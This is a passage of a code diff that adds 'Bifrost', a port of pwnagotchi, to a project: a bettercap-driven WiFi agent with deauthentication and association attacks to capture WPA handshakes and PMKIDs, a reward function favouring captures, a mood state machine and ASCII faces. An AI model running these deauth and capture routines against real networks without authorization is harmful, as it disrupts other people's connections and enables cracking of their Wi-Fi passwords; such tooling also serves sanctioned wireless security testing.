except Exception as e:
logger.error("Error setting recon channels: %s", e)
self.automata.wait_for(recon_time, self.epoch, sleeping=False,
stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
def get_access_points(self):
"""Fetch APs from bettercap, filter whitelist and open networks."""
aps = []
try:
s = self.bettercap.session()
plugins.on("unfiltered_ap_list", s.get('wifi', {}).get('aps', []))
for ap in s.get('wifi', {}).get('aps', []):
enc = ap.get('encryption', '')
if enc == '' or enc == 'OPEN':
continue
hostname = ap.get('hostname', '').lower()
mac = ap.get('mac', '').lower()
prefix = mac[:8]
if (hostname not in self._whitelist and
mac not in self._whitelist and
prefix not in self._whitelist):
if self._filter_included(ap):
aps.append(ap)
except Exception as e:
logger.error("Error getting APs: %s", e)
aps.sort(key=lambda a: a.get('channel', 0))
self._access_points = aps
plugins.on('wifi_update', aps)
self.epoch.observe(aps, list(self.automata.peers.values()))
# Update DB with discovered networks
self._persist_networks(aps)
return aps
def get_access_points_by_channel(self):
"""Get APs grouped by channel, sorted by density."""
aps = self.get_access_points()
grouped = {}
for ap in aps:
ch = ap.get('channel', 0)
if self._channels and ch not in self._channels:
continue
grouped.setdefault(ch, []).append(ap)
return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
def associate(self, ap, throttle=0):
"""Send association frame to trigger PMKID."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_associate', True) and
self._should_interact(ap.get('mac', ''))):
try:
hostname = ap.get('hostname', ap.get('mac', '?'))
logger.info("ASSOC %s (%s) ch=%d rssi=%d",
hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
self.bettercap.run('wifi.assoc %s' % ap['mac'])
self.epoch.track(assoc=True)
self._log_activity('assoc', 'Association: %s' % hostname,
self.voice.on_assoc(hostname))
except Exception as e:
self.automata.on_error(ap.get('mac', ''), e)
plugins.on('association', ap)
if throttle > 0:
time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
"""Deauthenticate client to capture handshake."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_deauth', True) and
self._should_interact(sta.get('mac', ''))):
try:
logger.info("DEAUTH %s (%s) from %s ch=%d",
sta.get('mac', ''), sta.get('vendor', ''),
ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
self.bettercap.run('wifi.deauth %s' % sta['mac'])
self.epoch.track(deauth=True)
self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
self.voice.on_deauth(sta.get('mac', '')))
except Exception as e:
self.automata.on_error(sta.get('mac', ''), e)
plugins.on('deauthentication', ap, sta)
if throttle > 0:
time.sleep(throttle)
def set_channel(self, channel, verbose=True):
"""Hop to a specific WiFi channel."""
if self.automata.is_stale(self.epoch):
return
wait = 0
if self.epoch.did_deauth:
wait = self._config.get('bifrost_personality_hop_recon_time', 10)
elif self.epoch.did_associate:
wait = self._config.get('bifrost_personality_min_recon_time', 5)
if channel != self._current_channel:
if self._current_channel != 0 and wait > 0:
logger.debug("waiting %ds on channel %d", wait, self._current_channel)
self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
try:
self.bettercap.run('wifi.recon.channel %d' % channel)
self._current_channel = channel
self.epoch.track(hop=True)
plugins.on('channel_hop', channel)
except Exception as e:
logger.error("Error setting channel: %s", e)
def next_epoch(self):
"""Transition to next epoch — evaluate mood."""
self.automata.next_epoch(self.epoch)
# Persist epoch to DB
data = self.epoch.data()
self._persist_epoch(data)
self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
"""Start event listener in background thread.
Tries websocket first; falls back to REST polling if the
``websockets`` package is not installed.
"""
t = threading.Thread(target=self._event_poller, daemon=True, name="BifrostEvents")
t.start()
def _event_poller(self):
try:
self.bettercap.run('events.clear')
except Exception:
pass
# Probe once whether websockets is available
try:
import websockets # noqa: F401
has_ws = True
except ImportError:
has_ws = False
logger.warning("websockets package not installed — using REST event polling "
"(pip install websockets for real-time events)")
if has_ws:
self._ws_event_loop()
else:
self._rest_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
tag = ev.get('tag', '')
if tag == 'wifi.client.handshake':
# Build a fake websocket message for the existing handler
import asyncio as _aio
_loop = _aio.new_event_loop()
_loop.run_until_complete(self._on_event(json.dumps(ev)))
_loop.close()
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
async def _on_event(self, msg):
"""Handle bettercap websocket events."""
try:
jmsg = json.loads(msg)
except json.JSONDecodeError:
return
if jmsg.get('tag') == 'wifi.client.handshake':
filename = jmsg.get('data', {}).get('file', '')
sta_mac = jmsg.get('data', {}).get('station', '')
ap_mac = jmsg.get('data', {}).get('ap', '')
key = "%s -> %s" % (sta_mac, ap_mac)
if key not in self._handshakes:
self._handshakes[key] = jmsg
self._last_pwnd = ap_mac
# Find AP info
ap_name = ap_mac
try:
s = self.bettercap.session()
for ap in s.get('wifi', {}).get('aps', []):
if ap.get('mac') == ap_mac:
if ap.get('hostname') and ap['hostname'] != '<hidden>':
ap_name = ap['hostname']
break
except Exception:
pass
logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
self.epoch.track(handshake=True)
self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
self._log_activity('handshake',
'Handshake: %s' % ap_name,
self.voice.on_handshakes(1))
plugins.on('handshake', filename, ap_mac, sta_mac)
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
def _persist_networks(self, aps):
"""Upsert discovered networks to DB."""
for ap in aps:
try:
self.db.execute(
"""INSERT INTO bifrost_networks
(bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(bssid) DO UPDATE SET
essid=?, channel=?, encryption=?, rssi=?, vendor=?,
num_clients=?, last_seen=CURRENT_TIMESTAMP""",
(ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])),
ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])))
)
except Exception as e:
logger.debug("Error persisting network: %s", e)
def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
try:
self.db.execute(
"""INSERT OR IGNORE INTO bifrost_handshakes
(ap_mac, sta_mac, ap_essid, filename)
VALUES (?, ?, ?, ?)""",
(ap_mac, sta_mac, ap_name, filename)
)
except Exception as e:
logger.debug("Error persisting handshake: %s", e)
def _persist_epoch(self, data):
try:
self.db.execute(
"""INSERT INTO bifrost_epochs
(epoch_num, started_at, duration_secs, num_deauths, num_assocs,
num_handshakes, num_hops, num_missed, num_peers, mood, reward,
cpu_load, mem_usage, temperature, meta_json)
VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
(self.epoch.epoch - 1, data.get('duration_secs', 0),
data.get('num_deauths', 0), data.get('num_associations', 0),
data.get('num_handshakes', 0), data.get('num_hops', 0),
data.get('missed_interactions', 0), data.get('num_peers', 0),
self.automata.mood, data.get('reward', 0),
data.get('cpu_load', 0), data.get('mem_usage', 0),
data.get('temperature', 0), '{}')
)
except Exception as e:
logger.debug("Error persisting epoch: %s", e)
def _log_activity(self, event_type, title, details=''):
"""Log an activity event to the DB."""
self.automata.voice_text = details or title
try:
self.db.execute(
"""INSERT INTO bifrost_activity (event_type, title, details)
VALUES (?, ?, ?)""",
(event_type, title, details)
)
except Exception as e:
logger.debug("Error logging activity: %s", e)

168
bifrost/automata.py Normal file
View File

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
"""Evaluates epoch data and transitions between moods."""
def __init__(self, config):
self._config = config
self.mood = 'starting'
self.face = MOOD_FACES.get('starting', '(. .)')
self.voice_text = ''
self._peers = {} # peer_id -> peer_data
@property
def peers(self):
return self._peers
def _set_mood(self, mood):
self.mood = mood
self.face = MOOD_FACES.get(mood, '(. .)')
def set_starting(self):
self._set_mood('starting')
def set_ready(self):
self._set_mood('ready')
plugins.on('ready')
def _has_support_network_for(self, factor):
bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
total_encounters = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in self._peers.values()
)
support_factor = total_encounters / bond_factor
return support_factor >= factor
def in_good_mood(self):
return self._has_support_network_for(1.0)
def set_grateful(self):
self._set_mood('grateful')
plugins.on('grateful')
def set_lonely(self):
if not self._has_support_network_for(1.0):
logger.info("unit is lonely")
self._set_mood('lonely')
plugins.on('lonely')
else:
logger.info("unit is grateful instead of lonely")
self.set_grateful()
def set_bored(self, inactive_for):
bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
factor = inactive_for / bored_epochs if bored_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> bored", inactive_for)
self._set_mood('bored')
plugins.on('bored')
else:
logger.info("unit is grateful instead of bored")
self.set_grateful()
def set_sad(self, inactive_for):
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = inactive_for / sad_epochs if sad_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> sad", inactive_for)
self._set_mood('sad')
plugins.on('sad')
else:
logger.info("unit is grateful instead of sad")
self.set_grateful()
def set_angry(self, factor):
if not self._has_support_network_for(factor):
logger.warning("too many misses -> angry (factor=%.1f)", factor)
self._set_mood('angry')
plugins.on('angry')
else:
logger.info("unit is grateful instead of angry")
self.set_grateful()
def set_excited(self):
logger.warning("lots of activity -> excited")
self._set_mood('excited')
plugins.on('excited')
def set_rebooting(self):
self._set_mood('broken')
plugins.on('rebooting')
def next_epoch(self, epoch):
"""Evaluate epoch state and transition mood.
Args:
epoch: BifrostEpoch instance
"""
was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
did_miss = epoch.num_missed
# Trigger epoch transition (resets counters, computes reward)
epoch.next()
max_misses = self._config.get('bifrost_personality_max_misses', 8)
excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
# Mood evaluation (same logic as pwnagotchi automata.py)
if was_stale:
factor = did_miss / max_misses if max_misses else 1
if factor >= 2.0:
self.set_angry(factor)
else:
logger.warning("agent missed %d interactions -> lonely", did_miss)
self.set_lonely()
elif epoch.sad_for:
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
if factor >= 2.0:
self.set_angry(factor)
else:
self.set_sad(epoch.inactive_for)
elif epoch.bored_for:
self.set_bored(epoch.inactive_for)
elif epoch.active_for >= excited_threshold:
self.set_excited()
elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
self.set_grateful()
plugins.on('epoch', epoch.epoch - 1, epoch.data())
def on_miss(self, who):
logger.info("it looks like %s is not in range anymore :/", who)
def on_error(self, who, e):
if 'is an unknown BSSID' in str(e):
self.on_miss(who)
else:
logger.error(str(e))
def is_stale(self, epoch):
return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
def wait_for(self, t, epoch, sleeping=True, stop_event=None):
"""Wait and track sleep time.
If *stop_event* is provided the wait is interruptible so the
engine can shut down quickly even during long recon windows.
"""
plugins.on('sleep' if sleeping else 'wait', t)
epoch.track(sleep=True, inc=t)
import time
if stop_event is not None:
stop_event.wait(t)
else:
time.sleep(t)

103
bifrost/bettercap.py Normal file
View File

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
"""Synchronous REST client for the bettercap API."""
def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
username='user', password='pass'):
self.hostname = hostname
self.scheme = scheme
self.port = port
self.username = username
self.password = password
self.url = "%s://%s:%d/api" % (scheme, hostname, port)
self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
self._auth_header = 'Basic ' + base64.b64encode(
('%s:%s' % (username, password)).encode()
).decode()
def _request(self, method, path, data=None, verbose_errors=True):
"""Make an HTTP request to bettercap API."""
url = "%s%s" % (self.url, path)
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, method=method)
req.add_header('Authorization', self._auth_header)
if body:
req.add_header('Content-Type', 'application/json')
try:
with urllib.request.urlopen(req, timeout=10) as resp:
raw = resp.read().decode('utf-8')
try:
return json.loads(raw)
except json.JSONDecodeError:
return raw
except urllib.error.HTTPError as e:
err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
if verbose_errors:
logger.info(err)
raise Exception(err)
except urllib.error.URLError as e:
raise Exception("bettercap unreachable: %s" % e.reason)
def session(self):
"""GET /api/session — current bettercap state."""
return self._request('GET', '/session')
def run(self, command, verbose_errors=True):
"""POST /api/session — execute a bettercap command."""
return self._request('POST', '/session', {'cmd': command},
verbose_errors=verbose_errors)
def events(self):
"""GET /api/events — poll recent events (REST fallback)."""
try:
result = self._request('GET', '/events', verbose_errors=False)
# Clear after reading so we don't reprocess
try:
self.run('events.clear', verbose_errors=False)
except Exception:
pass
return result if isinstance(result, list) else []
except Exception:
return []
async def start_websocket(self, consumer, stop_event=None):
"""Connect to bettercap websocket event stream.
Args:
consumer: async callable that receives each message string.
stop_event: optional threading.Event — exit when set.
"""
import websockets
import asyncio
ws_url = "%s/events" % self.websocket
while not (stop_event and stop_event.is_set()):
try:
async with websockets.connect(ws_url, ping_interval=60,
ping_timeout=90) as ws:
async for msg in ws:
if stop_event and stop_event.is_set():
return
try:
await consumer(msg)
except Exception as ex:
logger.debug("Error parsing event: %s", ex)
except Exception as ex:
if stop_event and stop_event.is_set():
return
logger.debug("Websocket error: %s — reconnecting...", ex)
await asyncio.sleep(2)

185
bifrost/compat.py Normal file
View File

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
"""Install the pwnagotchi namespace shim into sys.modules.
Call this BEFORE loading any pwnagotchi plugins so their
`import pwnagotchi` resolves to our shim.
"""
_start_time = time.time()
# Create the fake pwnagotchi module
pwn = types.ModuleType('pwnagotchi')
pwn.__version__ = '2.0.0-bifrost'
pwn.__file__ = __file__
pwn.config = _build_compat_config(shared_data)
def _name():
return shared_data.config.get('bjorn_name', 'bifrost')
def _set_name(n):
pass # no-op, name comes from Bjorn config
def _uptime():
return time.time() - _start_time
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
def _reboot():
pass # no-op in Bifrost — we don't auto-reboot
pwn.name = _name
pwn.set_name = _set_name
pwn.uptime = _uptime
pwn.cpu_load = _cpu_load
pwn.mem_usage = _mem_usage
pwn.temperature = _temperature
pwn.reboot = _reboot
# Register modules
sys.modules['pwnagotchi'] = pwn
sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod

292
bifrost/epoch.py Normal file
View File

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14 # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
"""Reward signal for RL — higher is better."""
def __call__(self, epoch_n, state):
eps = 1e-20
tot_epochs = epoch_n + eps
tot_interactions = max(
state['num_deauths'] + state['num_associations'],
state['num_handshakes']
) + eps
tot_channels = NUM_CHANNELS
# Positive signals
h = state['num_handshakes'] / tot_interactions
a = 0.2 * (state['active_for_epochs'] / tot_epochs)
c = 0.1 * (state['num_hops'] / tot_channels)
# Negative signals
b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
m = -0.3 * (state['missed_interactions'] / tot_interactions)
i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
_sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
_bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
s = -0.2 * (_sad / tot_epochs)
l_val = -0.1 * (_bored / tot_epochs)
return h + a + c + b + i + m + s + l_val
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
"""Tracks per-epoch counters, observations, and reward."""
def __init__(self, config):
self.epoch = 0
self.config = config
# Consecutive epoch counters
self.inactive_for = 0
self.active_for = 0
self.blind_for = 0
self.sad_for = 0
self.bored_for = 0
# Per-epoch action flags & counters
self.did_deauth = False
self.num_deauths = 0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.any_activity = False
# Timing
self.epoch_started = time.time()
self.epoch_duration = 0
# Channel histograms for AI observation
self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
self._observation = {
'aps_histogram': [0.0] * NUM_CHANNELS,
'sta_histogram': [0.0] * NUM_CHANNELS,
'peers_histogram': [0.0] * NUM_CHANNELS,
}
self._observation_ready = threading.Event()
self._epoch_data = {}
self._epoch_data_ready = threading.Event()
self._reward = RewardFunction()
def wait_for_epoch_data(self, with_observation=True, timeout=None):
self._epoch_data_ready.wait(timeout)
self._epoch_data_ready.clear()
if with_observation:
return {**self._observation, **self._epoch_data}
return self._epoch_data
def data(self):
return self._epoch_data
def observe(self, aps, peers):
"""Update observation histograms from current AP/peer lists."""
num_aps = len(aps)
if num_aps == 0:
self.blind_for += 1
else:
self.blind_for = 0
bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
self.num_peers = len(peers)
num_peers = self.num_peers + 1e-10
self.tot_bond_factor = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in peers
) / bond_unit_scale
self.avg_bond_factor = self.tot_bond_factor / num_peers
num_aps_f = len(aps) + 1e-10
num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
aps_per_chan = [0.0] * NUM_CHANNELS
sta_per_chan = [0.0] * NUM_CHANNELS
peers_per_chan = [0.0] * NUM_CHANNELS
for ap in aps:
ch_idx = ap.get('channel', 1) - 1
if 0 <= ch_idx < NUM_CHANNELS:
aps_per_chan[ch_idx] += 1.0
sta_per_chan[ch_idx] += len(ap.get('clients', []))
for peer in peers:
ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
ch_idx = ch - 1
if 0 <= ch_idx < NUM_CHANNELS:
peers_per_chan[ch_idx] += 1.0
# Normalize
aps_per_chan = [e / num_aps_f for e in aps_per_chan]
sta_per_chan = [e / num_sta for e in sta_per_chan]
peers_per_chan = [e / num_peers for e in peers_per_chan]
self._observation = {
'aps_histogram': aps_per_chan,
'sta_histogram': sta_per_chan,
'peers_histogram': peers_per_chan,
}
self._observation_ready.set()
def track(self, deauth=False, assoc=False, handshake=False,
hop=False, sleep=False, miss=False, inc=1):
"""Increment epoch counters."""
if deauth:
self.num_deauths += inc
self.did_deauth = True
self.any_activity = True
if assoc:
self.num_assocs += inc
self.did_associate = True
self.any_activity = True
if miss:
self.num_missed += inc
if hop:
self.num_hops += inc
# Reset per-channel flags on hop
self.did_deauth = False
self.did_associate = False
if handshake:
self.num_shakes += inc
self.did_handshakes = True
if sleep:
self.num_slept += inc
def next(self):
"""Transition to next epoch — compute reward, update streaks, reset counters."""
# Update activity streaks
if not self.any_activity and not self.did_handshakes:
self.inactive_for += 1
self.active_for = 0
else:
self.active_for += 1
self.inactive_for = 0
self.sad_for = 0
self.bored_for = 0
sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
if self.inactive_for >= sad_threshold:
self.bored_for = 0
self.sad_for += 1
elif self.inactive_for >= bored_threshold:
self.sad_for = 0
self.bored_for += 1
else:
self.sad_for = 0
self.bored_for = 0
now = time.time()
self.epoch_duration = now - self.epoch_started
# System metrics
cpu = _cpu_load()
mem = _mem_usage()
temp = _temperature()
# Cache epoch data for other threads
self._epoch_data = {
'duration_secs': self.epoch_duration,
'slept_for_secs': self.num_slept,
'blind_for_epochs': self.blind_for,
'inactive_for_epochs': self.inactive_for,
'active_for_epochs': self.active_for,
'sad_for_epochs': self.sad_for,
'bored_for_epochs': self.bored_for,
'missed_interactions': self.num_missed,
'num_hops': self.num_hops,
'num_peers': self.num_peers,
'tot_bond': self.tot_bond_factor,
'avg_bond': self.avg_bond_factor,
'num_deauths': self.num_deauths,
'num_associations': self.num_assocs,
'num_handshakes': self.num_shakes,
'cpu_load': cpu,
'mem_usage': mem,
'temperature': temp,
}
self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
self._epoch_data_ready.set()
logger.info(
"[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
"hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
self.epoch, int(self.epoch_duration), self.blind_for,
self.sad_for, self.bored_for, self.inactive_for, self.active_for,
self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
self.num_shakes, self._epoch_data['reward'],
)
# Reset for next epoch
self.epoch += 1
self.epoch_started = now
self.did_deauth = False
self.num_deauths = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0

66
bifrost/faces.py Normal file
View File

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
MOOD_FACES = {
'starting': STARTING,
'ready': READY,
'sleeping': SLEEP,
'awake': AWAKE,
'bored': BORED,
'sad': SAD,
'angry': ANGRY,
'excited': EXCITED,
'lonely': LONELY,
'grateful': GRATEFUL,
'happy': HAPPY,
'cool': COOL,
'intense': INTENSE,
